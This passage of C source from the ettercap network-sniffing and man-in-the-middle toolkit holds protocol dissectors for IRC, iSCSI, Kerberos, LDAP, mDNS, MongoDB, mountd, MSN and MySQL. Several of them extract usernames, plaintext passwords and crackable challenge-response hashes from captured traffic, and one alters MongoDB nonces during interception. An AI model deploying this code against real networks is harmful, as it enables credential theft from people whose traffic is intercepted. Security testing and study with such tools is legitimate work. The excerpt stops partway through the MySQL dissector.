char*)ptr + 5); if ( (p = strchr(user, '\r')) != NULL ) *p = '\0'; if ( (p = strchr(user, '\n')) != NULL ) *p = '\0'; DISSECT_MSG("IRC : %s:%d -> USER: %s (%s)\n", ip_addr_ntoa(&PACKET->L3.dst, tmp), ntohs(PACKET->L4.dst), s->data, user); SAFE_FREE(user); } /* save the session */ session_put(s); return NULL; } /* delete the user */ if (!strncasecmp((const char*)ptr, "QUIT ", 5)) { dissect_wipe_session(PACKET, DISSECT_CODE(dissector_irc)); return NULL; } return NULL; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/dissectors/ec_iscsi.c000664 000000 000000 00000014005 13711276346 020360 0ustar00rootroot000000 000000 /* ettercap -- dissector for iSCSI CHAP authentication -- TCP 860 3260 Copyright (C) Dhiru Kholia (dhiru at openwall.com) Tested with, 1. Dell EqualLogic target and Open-iSCSI initiator on CentOS 6.2 2. LIO Target and Open-iSCSI initiator, both on Arch Linux 2012 This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. */ #include #include #include #include /* globals */ struct iscsi_status { u_char status; u_char id; /* CHAP_I */ u_char challenge[49]; /* CHAP_C can be 24 bytes long (48 bytes hex-encoded) */ }; #define WAIT_RESPONSE 1 /* protos */ FUNC_DECODER(dissector_iscsi); void iscsi_init(void); /************************************************/ /* borrowed from http://dsss.be/w/c:memmem */ static unsigned char *_memmem(unsigned char *haystack, int hlen, char *needle, int nlen) { int i, j = 0; if (nlen > hlen) return 0; switch (nlen) { // we have a few specialized compares for certain needle sizes case 0: // no needle? just give the haystack return haystack; case 1: // just use memchr for 1-byte needle return memchr(haystack, needle[0], hlen); case 2: // use 16-bit compares for 2-byte needles for (i = 0; i < hlen - nlen + 1; i++) { if (*(uint16_t *) (haystack + i) == *(uint16_t *) needle) { return haystack + i; } } break; case 4: // use 32-bit compares for 4-byte needles for (i = 0; i < hlen - nlen + 1; i++) { if (*(uint32_t *) (haystack + i) == *(uint32_t *) needle) { return haystack + i; } } break; default: // generic compare for any other needle size // walk i through the haystack, matching j as long as needle[j] matches haystack[i] for (i = 0; i < hlen - nlen + 1; i++) { if (haystack[i] == needle[j]) { if (j == nlen - 1) { // end of needle and it all matched? win. return haystack + i - j; } else { // keep advancing j (and i, implicitly) j++; } } else { // no match, rewind i the length of the failed match (j), and reset j i -= j; j = 0; } } } return NULL; } /* * this function is the initializer. * it adds the entry in the table of registered decoder */ void __init iscsi_init(void) { dissect_add("iscsi", APP_LAYER_TCP, 860, dissector_iscsi); dissect_add("iscsi", APP_LAYER_TCP, 3260, dissector_iscsi); } FUNC_DECODER(dissector_iscsi) { DECLARE_DISP_PTR_END(ptr, end); struct ec_session *s = NULL; void *ident = NULL; char tmp[MAX_ASCII_ADDR_LEN]; struct iscsi_status *conn_status; //suppress unused warning (void)end; (void) DECODE_DATA; (void) DECODE_DATALEN; (void) DECODED_LEN; /* Packets coming from the server */ if (FROM_SERVER("iscsi", PACKET)) { /* Interesting packets have len >= 4 */ if (PACKET->DATA.len < 4) return NULL; dissect_create_ident(&ident, PACKET, DISSECT_CODE(dissector_iscsi)); /* if the session does not exist... */ if (session_get(&s, ident, DISSECT_IDENT_LEN) == -E_NOTFOUND) { /* search for CHAP ID and Message Challenge */ char *i = (char*)_memmem(ptr, PACKET->DATA.len, "CHAP_I", 6); char *c = (char*)_memmem(ptr, PACKET->DATA.len, "CHAP_C", 6); if (i && c) { /* create the new session */ dissect_create_session(&s, PACKET, DISSECT_CODE(dissector_iscsi)); /* remember the state (used later) */ SAFE_CALLOC(s->data, 1, sizeof(struct iscsi_status)); conn_status = (struct iscsi_status *) s->data; conn_status->status = WAIT_RESPONSE; conn_status->id = (u_char)atoi(i + 7); /* CHAP_C is always null-terminated */ strncpy((char*)conn_status->challenge, c + 9, 48); conn_status->challenge[48] = 0; /* save the session */ session_put(s); } } } else { /* Packets coming from the client */ dissect_create_ident(&ident, PACKET, DISSECT_CODE(dissector_iscsi)); /* Only if we catched the connection from the beginning */ if (session_get(&s, ident, DISSECT_IDENT_LEN) == E_SUCCESS) { conn_status = (struct iscsi_status *) s->data; char *n = NULL; char *r = NULL; if (PACKET->DATA.len > 5) { n = (char*)_memmem(ptr, PACKET->DATA.len, "CHAP_N", 6); r = (char*)_memmem(ptr, PACKET->DATA.len, "CHAP_R", 6); } if (conn_status->status == WAIT_RESPONSE && n && r) { char user[65]; char response[33]; DEBUG_MSG("\tDissector_iscsi RESPONSE"); /* CHAP_R and CHAP_N are always null-terminated */ /* Even possibly wrong passwords can be useful, * don't look for login result */ strncpy(response, r + 9, 32); response[32] = 0; strncpy(user, n + 7, 64); user[64] = 0; DISSECT_MSG("%s-%s-%d:$chap$%d*%s*%s\n", user, ip_addr_ntoa(&PACKET->L3.dst, tmp), ntohs(PACKET->L4.dst), conn_status->id, conn_status->challenge, response); dissect_wipe_session(PACKET, DISSECT_CODE(dissector_iscsi)); } } } SAFE_FREE(ident); return NULL; } // vim:ts=3:expandtab ettercap-0.8.3.1/src/dissectors/ec_kerberos.c000664 000000 000000 00000010064 13711276346 021063 0ustar00rootroot000000 000000 /* ettercap -- dissector for Kerberos v5 - TCP 88 / UDP 88 Copyright (C) Dhiru Kholia (dhiru at openwall.com) This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include #include /* protos */ FUNC_DECODER(dissector_kerberos); void kerberos_init(void); void __init kerberos_init(void) { dissect_add("kerberosu", APP_LAYER_UDP, 88, dissector_kerberos); dissect_add("kerberost", APP_LAYER_TCP, 88, dissector_kerberos); } /* https://cwiki.apache.org/confluence/display/DIRxASN1/Kerberos KDC-REQ ::= SEQUENCE { -- NOTE: first tag is [1], not [0] pvno [1] INTEGER (5) , msg-type [2] INTEGER (10 -- AS -- | 12 -- TGS --), padata [3] SEQUENCE OF PA-DATA OPTIONAL -- NOTE: not empty --, req-body [4] KDC-REQ-BODY } KDC-REQ-BODY ::= SEQUENCE { kdc-options [0] KDCOptions, cname [1] PrincipalName OPTIONAL -- Used only in AS-REQ --, realm [2] Realm -- Server's realm -- Also client's in AS-REQ --, sname [3] PrincipalName OPTIONAL, from [4] KerberosTime OPTIONAL, till [5] KerberosTime, rtime [6] KerberosTime OPTIONAL, nonce [7] UInt32, etype [8] SEQUENCE OF Int32 -- EncryptionType -- in preference order --, addresses [9] HostAddresses OPTIONAL, enc-authorization-data [10] EncryptedData OPTIONAL -- AuthorizationData --, additional-tickets [11] SEQUENCE OF Ticket OPTIONAL -- NOTE: not empty } AS-REQ ::= [APPLICATION 10] KDC-REQ */ FUNC_DECODER(dissector_kerberos) { u_char *ptr; ptr = PACKET->DATA.data; struct asn1_hdr hdr; size_t length = PACKET->DATA.len; u_char *pos, *end; /* don't complain about unused var */ (void)DECODE_DATA; (void)DECODE_DATALEN; (void)DECODED_LEN; if (length < 4) return NULL; /* Check for initial AS-REQ packet */ if (FROM_CLIENT("kerberosu", PACKET) || FROM_CLIENT("kerberost", PACKET)) { pos = ptr; // APPLICATION 10 if (asn1_get_next(pos, length, &hdr) < 0 || hdr.class != ASN1_CLASS_APPLICATION || hdr.tag != 10) { // Hack to skip over "Record Mark" pos = pos + 4; if (asn1_get_next(pos, length, &hdr) < 0 || hdr.class != ASN1_CLASS_APPLICATION || hdr.tag != 10) { return NULL; } } pos = hdr.payload; end = pos + hdr.length; if (end > pos + PACKET->DATA.len) return NULL; // KDC-REQ SEQUENCE if (asn1_get_next(pos, end - pos, &hdr) < 0 || hdr.class != ASN1_CLASS_UNIVERSAL || hdr.tag != ASN1_TAG_SEQUENCE) { return NULL; } pos = hdr.payload; // Seems like an AS-REQ message hook_point(HOOK_PROTO_KRB5, PACKET); } else { // KDC to client packet. BUG: if packet is modified here, then // we get invalid UDP checksums on the client side! } return NULL; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/dissectors/ec_ldap.c000664 000000 000000 00000006246 13711276346 020176 0ustar00rootroot000000 000000 /* ettercap -- dissector ldap -- TCP 389 Copyright (C) ALoR & NaGA Additional Copyright for this file: LnZ Lorenzo Porro This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. */ #include #include #include #include /* protos */ FUNC_DECODER(dissector_ldap); void ldap_init(void); /************************************************/ /* * this function is the initializer. * it adds the entry in the table of registered decoder */ void __init ldap_init(void) { dissect_add("ldap", APP_LAYER_TCP, 389, dissector_ldap); sslw_dissect_add("ldaps", 636, dissector_ldap, SSL_ENABLED); } FUNC_DECODER(dissector_ldap) { DECLARE_DISP_PTR_END(ptr, end); u_int16 type, user_len, pass_len; char tmp[MAX_ASCII_ADDR_LEN]; /* don't complain about unused var */ (void) DECODE_DATA; (void) DECODE_DATALEN; (void) DECODED_LEN; /* We need at least 15 bytes of data to be interested*/ if (PACKET->DATA.len < 15) return NULL; /* Only packets coming from the server */ if (FROM_SERVER("ldap", PACKET) || FROM_SERVER("ldaps", PACKET)) return NULL; /* Message Type */ type = (u_int16)ptr[5]; if (type != 0x60 && type != 0x00) return NULL; /* Quite self-explaining :) */ user_len = (u_int16)ptr[11]; if ((ptr + user_len + 12) > end) return NULL; pass_len = (u_int16)ptr[13 + user_len]; if ((ptr + user_len + pass_len + 14) > end) return NULL; if (user_len == 0) { PACKET->DISSECTOR.user = strdup("[Anonymous Bind]"); PACKET->DISSECTOR.pass = strdup(""); DISSECT_MSG("LDAP : %s:%d -> Anonymous Bind\n", ip_addr_ntoa(&PACKET->L3.dst, tmp), ntohs(PACKET->L4.dst)); return NULL; } /* user_len and pass_len are u_int16, so no int overflow :) */ SAFE_CALLOC(PACKET->DISSECTOR.user, user_len + 1, sizeof(char)); SAFE_CALLOC(PACKET->DISSECTOR.pass, pass_len + 1, sizeof(char)); memcpy(PACKET->DISSECTOR.user, &ptr[12], user_len); memcpy(PACKET->DISSECTOR.pass, &ptr[14] + user_len, pass_len); DISSECT_MSG("LDAP : %s:%d -> USER: %s PASS: %s\n", ip_addr_ntoa(&PACKET->L3.dst, tmp), ntohs(PACKET->L4.dst), PACKET->DISSECTOR.user, PACKET->DISSECTOR.pass); return NULL; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/dissectors/ec_mdns.c000664 000000 000000 00000011313 13711276346 020206 0ustar00rootroot000000 000000 /* ettercap -- dissector for multicast DNS This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include FUNC_DECODER(dissector_mdns); void mdns_init(void); static void handle_ipv4_record(char* name, char* ptr); static void handle_ipv6_record(char* name, char* ptr); static void handle_srv_record(char* name, char* port_ptr, struct packet_object *po); static const char local_tcp[] = "._tcp.local"; static const char local_udp[] = "._udp.local"; /************************************************/ void __init mdns_init(void) { dissect_add("mdns", APP_LAYER_UDP, 5353, dissector_mdns); } FUNC_DECODER(dissector_mdns) { uint16_t questions = 0; uint16_t records = 0; unsigned char* start = NULL; char name[NS_MAXDNAME]; DECLARE_DISP_PTR_END(ptr, end); // unused param supression (void)buf; (void)buflen; (void)len; // skip packets which are not useful if (PACKET->DATA.len <= 12) return NULL; PACKET->PASSIVE.flags |= FP_HOST_LOCAL; questions = ntohs(*((uint16_t*)ptr + 4)); hook_point(HOOK_PROTO_MDNS, PACKET); if (questions > 0) { //skip packets with questions for now. Makes parsing easier return NULL; } records += ntohs(*((uint16_t*)(ptr + 6))); records += ntohs(*((uint16_t*)(ptr + 8))); records += ntohs(*((uint16_t*)(ptr + 10))); if (records == 0) { // there is nothing to parse return NULL; } if ((ptr + 12) >= end) { // not enough data return NULL; } // store the start for dns records pointers start = ptr; ptr += 12; // loop over all the records for ( ; records > 0; --records) { uint16_t type = 0; uint16_t length = 0; uint16_t name_len = dn_expand(start, end, ptr, name, sizeof(name)); if ((ptr + name_len + 10) >= end) { return NULL; } ptr += name_len; type = ntohs(*((uint16_t*)(ptr))); length = ntohs(*((uint16_t*)(ptr + 8))); if ((ptr + 10 + length) >= end) { return NULL; } ptr += 10; switch (type) { case ns_t_a: // A host IPv4 handle_ipv4_record(name, (char*)ptr); break; case ns_t_aaaa: // AAAA (Host IPv6 Address) handle_ipv6_record(name, (char*)ptr); break; case ns_t_srv: // Service handle_srv_record(name, (char*)ptr + 4, PACKET); break; default: //various other types should hit here: TXT, HINFO, etc. break; } // skip over the rest of the record ptr += length; } return NULL; } static void handle_ipv4_record(char* name, char* ptr) { uint32_t addr; struct ip_addr ip; NS_GET32(addr, ptr); addr = htonl(addr); ip_addr_init(&ip, AF_INET, (u_char *)&addr); /* insert the answer in the resolv cache */ resolv_cache_insert_passive(&ip, name); } static void handle_ipv6_record(char* name, char* ptr) { uint16_t addr[8]; struct ip_addr ip; int i = 0; for (i=0; i<8; i++) { NS_GET16(addr[i], ptr); addr[i] = htons(addr[i]); } ip_addr_init(&ip, AF_INET6, (u_char *)&addr); /* insert the answer in the resolv cache */ resolv_cache_insert_passive(&ip, name); } static void handle_srv_record(char* name, char* port_ptr, struct packet_object *po) { uint16_t port; NS_GET16(port, port_ptr); port = ntohs(port); if (strlen(name) > sizeof(local_tcp)) { int name_offset = strlen(name) - (sizeof(local_tcp) - 1); if (strncmp(name + name_offset, local_tcp, sizeof(local_tcp) - 1) == 0) { PACKET->DISSECTOR.advertised_proto = NL_TYPE_TCP; } else if (strncmp(name + name_offset, local_udp, sizeof(local_udp) - 1) == 0) { PACKET->DISSECTOR.advertised_proto = NL_TYPE_UDP; } PACKET->DISSECTOR.advertised_port = port; } } ettercap-0.8.3.1/src/dissectors/ec_mongodb.c000664 000000 000000 00000012672 13711276346 020703 0ustar00rootroot000000 000000 /* ettercap -- dissector for MongoDB authenctication protocol -- TCP 1521 Copyright (C) Dhiru Kholia (dhiru at openwall.com) Tested with MongoDB 2.2.1 on Arch Linux (November 2012) This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. */ #include #include #include #include /* globals */ struct mongodb_status { u_char status; u_char username[129]; u_char salt[17]; }; #define WAIT_RESPONSE 1 #define WAIT_RESULT 2 /* protos */ FUNC_DECODER(dissector_mongodb); void mongodb_init(void); /************************************************/ /* * this function is the initializer. * it adds the entry in the table of registered decoder */ void __init mongodb_init(void) { dissect_add("mongodb", APP_LAYER_TCP, 27017, dissector_mongodb); } FUNC_DECODER(dissector_mongodb) { DECLARE_DISP_PTR_END(ptr, end); struct ec_session *s = NULL; void *ident = NULL; char tmp[MAX_ASCII_ADDR_LEN]; struct mongodb_status *conn_status; //suppress unused warning (void)end; (void) DECODE_DATA; (void) DECODE_DATALEN; (void) DECODED_LEN; if (FROM_SERVER("mongodb", PACKET)) { if (PACKET->DATA.len < 13) return NULL; dissect_create_ident(&ident, PACKET, DISSECT_CODE(dissector_mongodb)); /* if the session does not exist... */ if (session_get(&s, ident, DISSECT_IDENT_LEN) == -E_NOTFOUND) { unsigned char *noncep = memmem(ptr, PACKET->DATA.len, "nonce", 5); unsigned char *gnoncep = memmem(ptr, PACKET->DATA.len, "getnonce\x00", 9); unsigned char *keyp = memmem(ptr, PACKET->DATA.len, "authenticate\x00", 12); if (noncep && !gnoncep && !keyp) { /* create the new session */ dissect_create_session(&s, PACKET, DISSECT_CODE(dissector_mongodb)); /* remember the state (used later) */ SAFE_CALLOC(s->data, 1, sizeof(struct mongodb_status)); conn_status = (struct mongodb_status *) s->data; conn_status->status = WAIT_RESPONSE; /* find and change nonce */ unsigned char *p = noncep; p += (5 + 1 + 4); /* skip over "nonce" + '\x00; + length */ strncpy((char*)conn_status->salt, (char*)p, 16); conn_status->salt[16] = 0; #ifdef MITM memset(p, 0, 16); PACKET->flags |= PO_MODIFIED; #endif /* save the session */ session_put(s); } } else { if (session_get(&s, ident, DISSECT_IDENT_LEN) == E_SUCCESS) { conn_status = (struct mongodb_status *) s->data; if (PACKET->DATA.len < 16) return NULL; unsigned char *res = memmem(ptr, PACKET->DATA.len, "fails", 5); unsigned char *gres = memmem(ptr, PACKET->DATA.len, "readOnly", 8); if (conn_status->status == WAIT_RESULT && res) { DISSECT_MSG("Login to %s-%d as %s failed!\n", ip_addr_ntoa(&PACKET->L3.src, tmp), ntohs(PACKET->L4.src), conn_status->username); dissect_wipe_session(PACKET, DISSECT_CODE(dissector_mongodb)); } else if (gres) { DISSECT_MSG("Login to %s-%d as %s succeeded!\n", ip_addr_ntoa(&PACKET->L3.src, tmp), ntohs(PACKET->L4.src), conn_status->username) ; dissect_wipe_session(PACKET, DISSECT_CODE(dissector_mongodb)); } } } } else { dissect_create_ident(&ident, PACKET, DISSECT_CODE(dissector_mongodb)); if (session_get(&s, ident, DISSECT_IDENT_LEN) == E_SUCCESS) { conn_status = (struct mongodb_status *) s->data; if (PACKET->DATA.len < 16) return NULL; unsigned char *noncep = memmem(ptr, PACKET->DATA.len, "nonce", 5); unsigned char *keyp = memmem(ptr, PACKET->DATA.len, "key\x00", 4); unsigned char *usernamep = memmem(ptr, PACKET->DATA.len, "user\x00", 5); if (conn_status->status == WAIT_RESPONSE && noncep && keyp) { usernamep += (4 + 1 + 4); /* skip over "user" + '\x00; + length */ strncpy((char*)conn_status->username, (char*)usernamep, 128); conn_status->username[128] = 0; unsigned char key[33]; keyp += (3 + 1 + 4); /* skip over "key" + '\x00; + length */ strncpy((char*)key, (char*)keyp, 32); key[32] = 0; DISSECT_MSG("%s-%s-%d:$mongodb$1$%s$%s$%s\n", conn_status->username, ip_addr_ntoa(&PACKET->L3.src, tmp), ntohs(PACKET->L4.src), conn_status->username, conn_status->salt, key); conn_status->status = WAIT_RESULT; } } } SAFE_FREE(ident); return NULL; } ettercap-0.8.3.1/src/dissectors/ec_mountd.c000664 000000 000000 00000007535 13711276346 020566 0ustar00rootroot000000 000000 /* ettercap -- dissector mountd -- TCP 2049 Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include /* globals */ typedef struct { u_int32 xid; u_int32 ver; u_char *rem_dir; } mountd_session; /* protos */ FUNC_DECODER(dissector_mountd); void mountd_init(void); /************************************************/ /* * this function is the initializer. * it adds the entry in the table of registered decoder */ void __init mountd_init(void) { /* This is inserted into the dissectors' chain by the portmap dissector */ dissect_add("mountd", APP_LAYER_TCP, 2049, dissector_mountd); } FUNC_DECODER(dissector_mountd) { DECLARE_DISP_PTR_END(ptr, end); u_int32 type, xid, proc, program, version, flen, cred, offs, i; mountd_session *pe; struct ec_session *s = NULL; void *ident = NULL; char tmp[MAX_ASCII_ADDR_LEN]; /* don't complain about unused var */ (void)end; (void) DECODE_DATA; (void) DECODE_DATALEN; (void) DECODED_LEN; /* skip packets which are not useful */ if (PACKET->DATA.len < 24) return NULL; DEBUG_MSG("mountd --> dissector_mountd"); /* Offsets differs from TCP to UDP (?) */ if (PACKET->L4.proto == NL_TYPE_TCP) ptr += 4; xid = pntol(ptr); type = pntol(ptr + 4); /* CALL */ if (FROM_CLIENT("mountd", PACKET)) { program = pntol(ptr + 12); version = pntol(ptr + 16); proc = pntol(ptr + 20); if (type != 0 || program != 100005 || proc != 1 ) return NULL; /* Take remote dir (with some checks) */ cred = pntol(ptr + 28); if (cred > PACKET->DATA.len) return NULL; flen = pntol(ptr + 40 + cred); if (flen > 100) return NULL; dissect_create_session(&s, PACKET, DISSECT_CODE(dissector_mountd)); SAFE_CALLOC(s->data, 1, sizeof(mountd_session)); pe = (mountd_session *)s->data; pe->xid = xid; pe->ver = version; SAFE_CALLOC(pe->rem_dir, 1, flen + 1); memcpy(pe->rem_dir, ptr + 44 + cred, flen); session_put(s); return NULL; } /* REPLY */ dissect_create_ident(&ident, PACKET, DISSECT_CODE(dissector_mountd)); if (session_get(&s, ident, DISSECT_IDENT_LEN) == -E_NOTFOUND) { SAFE_FREE(ident); return NULL; } SAFE_FREE(ident); pe = (mountd_session *)s->data; PACKET->DISSECTOR.banner = strdup("mountd"); /* Unsuccess or not a reply */ if (!pe || !(pe->rem_dir) || pe->xid != xid || pntol(ptr + 24) != 0 || type != 1) return NULL; /* Take the handle */ if (pe->ver == 3) { flen = pntol(ptr + 28); if (flen > 64) flen = 64; offs = 32; } else { flen = 32; offs = 28; } DISSECT_MSG("mountd : Server:%s Handle %s: [ ", ip_addr_ntoa(&PACKET->L3.src, tmp), pe->rem_dir); for (i=0; i (flen*3)+10) break; DISSECT_MSG("%02x ", ptr[i + offs]); } DISSECT_MSG("]\n"); SAFE_FREE(pe->rem_dir); dissect_wipe_session(PACKET, DISSECT_CODE(dissector_mountd)); return NULL; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/dissectors/ec_msn.c000664 000000 000000 00000013461 13711276346 020050 0ustar00rootroot000000 000000 /* ettercap -- dissector MSN -- TCP 1863 Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include /* globals */ /* protos */ FUNC_DECODER(dissector_msn); void msn_init(void); /************************************************/ /* * this function is the initializer. * it adds the entry in the table of registered decoder */ void __init msn_init(void) { dissect_add("msn", APP_LAYER_TCP, 1863, dissector_msn); } FUNC_DECODER(dissector_msn) { DECLARE_DISP_PTR_END(ptr, end); char tmp[MAX_ASCII_ADDR_LEN]; struct ec_session *s = NULL; void *ident = NULL; char *token, *tok; /* don't complain about unused var */ (void)end; (void) DECODE_DATA; (void) DECODE_DATALEN; (void) DECODED_LEN; /* skip empty packets (ACK packets) */ if (PACKET->DATA.len == 0) return NULL; DEBUG_MSG("MSN --> TCP dissector_msn"); /* message coming from the client */ if (FROM_CLIENT("msn", PACKET)) { /* FIRST STEP: the client sends the login */ dissect_create_ident(&ident, PACKET, DISSECT_CODE(dissector_msn)); /* if the session does not exist... */ if (session_get(&s, ident, DISSECT_IDENT_LEN) == -E_NOTFOUND) { /* search the login */ ptr = (u_char*)strstr((const char*)ptr, "MD5 I "); /* not found */ if (ptr == NULL) goto bad; DEBUG_MSG("\tDissector_msn - LOGIN "); /* create the new session */ dissect_create_session(&s, PACKET, DISSECT_CODE(dissector_msn)); /* save the login */ s->data = strdup((const char*)ptr + strlen("MD5 I ")); /* tuncate at the \r */ if ( (ptr = (u_char*)strchr(s->data,'\r')) != NULL ) *ptr = '\0'; session_put(s); } else { /* THIRD STEP: the client sends the MD5 password */ dissect_create_ident(&ident, PACKET, DISSECT_CODE(dissector_msn)); /* if the session does not exist... */ if (session_get(&s, ident, DISSECT_IDENT_LEN) == E_SUCCESS) { /* search the login */ ptr = (u_char*)strstr((const char*)ptr, "MD5 S "); /* not found */ if (ptr == NULL) goto bad; DEBUG_MSG("\tDissector_msn - PASS "); /* save the challenge after the login */ SAFE_REALLOC(s->data, strlen(s->data) + strlen((const char*)ptr) + 2); snprintf(s->data + strlen(s->data), strlen(s->data) + strlen((const char*)ptr)+2, " %s", ptr + strlen("MD5 S ")); /* tuncate at the \r */ if ( (ptr = (u_char*)strchr(s->data,'\r')) != NULL ) *ptr = '\0'; /* save the proper value (splitting the string) * it contains: * "user challenge password" */ if ((token = ec_strtok(s->data, " ", &tok))) { PACKET->DISSECTOR.user = strdup(token); if ((token = ec_strtok(NULL, " ", &tok))) { PACKET->DISSECTOR.info = strdup(token); if ((token = ec_strtok(NULL, " ", &tok))) { PACKET->DISSECTOR.pass = strdup(token); /* display the message */ DISSECT_MSG("MSN : %s:%d -> USER: %s MD5 PASS: %s CHALLENGE: %s\n", ip_addr_ntoa(&PACKET->L3.dst, tmp), ntohs(PACKET->L4.dst), PACKET->DISSECTOR.user, PACKET->DISSECTOR.pass, PACKET->DISSECTOR.info); } } } /* wipe the session */ dissect_wipe_session(PACKET, DISSECT_CODE(dissector_msn)); } } } else { /* the message is from the server */ /* SECOND STEP: the server sends the challenge */ dissect_create_ident(&ident, PACKET, DISSECT_CODE(dissector_msn)); /* if the session does not exist... */ if (session_get(&s, ident, DISSECT_IDENT_LEN) == E_SUCCESS) { /* search the login */ ptr = (u_char*)strstr((const char*)ptr, "MD5 S "); /* not found */ if (ptr == NULL) goto bad; DEBUG_MSG("\tDissector_msn - CHALLENGE "); /* save the challenge after the login */ SAFE_REALLOC(s->data, strlen(s->data) + strlen((const char*)ptr) + 2); snprintf(s->data + strlen(s->data), strlen(s->data)+strlen((const char*)ptr)+2, " %s", ptr + strlen("MD5 S ")); /* tuncate at the \r */ if ( (ptr = (u_char*)strchr(s->data,'\r')) != NULL ) *ptr = '\0'; } } bad: SAFE_FREE(ident); return NULL; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/dissectors/ec_mysql.c000664 000000 000000 00000016433 13711276346 020422 0ustar00rootroot000000 000000 /* ettercap -- dissector MySQL -- TCP 3306 Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include /* protos */ FUNC_DECODER(dissector_mysql); void mysql_init(void); /************************************************/ /* * this function is the initializer. * it adds the entry in the table of registered decoder */ void __init mysql_init(void) { dissect_add("mysql", APP_LAYER_TCP, 3306, dissector_mysql); } #ifdef DEBUG /* XXX - not used??? static void print_hex(unsigned char *str, int len) { int i; for (i = 0; i < len; ++i) printf("%02x", str[i]); printf("\n"); } */ #endif static char itoa16[16] = "0123456789abcdef"; static inline void hex_encode(unsigned char *str, int len, unsigned char *out) { int i; for (i = 0; i < len; ++i) { out[0] = itoa16[str[i]>>4]; out[1] = itoa16[str[i]&0xF]; out += 2; } } FUNC_DECODER(dissector_mysql) { DECLARE_DISP_PTR_END(ptr, end); struct ec_session *s = NULL; void *ident = NULL; char tmp[MAX_ASCII_ADDR_LEN]; int old_mysql = 0; unsigned char input[20]; unsigned char output[41]; int has_password = 0; /* don't complain about unused var */ (void) DECODE_DATA; (void) DECODE_DATALEN; (void) DECODED_LEN; /* Skip ACK packets */ if (PACKET->DATA.len == 0) return NULL; dissect_create_ident(&ident, PACKET, DISSECT_CODE(dissector_mysql)); /* Packets coming from the server */ if (FROM_SERVER("mysql", PACKET)) { /* if the session does not exist... */ if (session_get(&s, ident, DISSECT_IDENT_LEN) == -E_NOTFOUND) { u_int index = 5; /* Check magic numbers and catch the banner */ if (!memcmp(ptr + 1, "\x00\x00\x00\x0a\x33\x2e", 6)) { DEBUG_MSG("\tdissector_mysql BANNER"); PACKET->DISSECTOR.banner = strdup("MySQL v3.xx.xx"); old_mysql = 1; } else if (!memcmp(ptr + 1, "\x00\x00\x00\x0a\x34\x2e", 6)) { DEBUG_MSG("\tdissector_mysql BANNER"); PACKET->DISSECTOR.banner = strdup("MySQL v4.xx.xx"); old_mysql = 1; } else if (PACKET->DATA.len - 4 == ptr[0] && ptr[3] == 0 && ptr[4] == 10) { /* check Packet Length + Packet Number + Protocol */ DEBUG_MSG("\tdissector_mysql BANNER"); PACKET->DISSECTOR.banner = strdup("MySQL 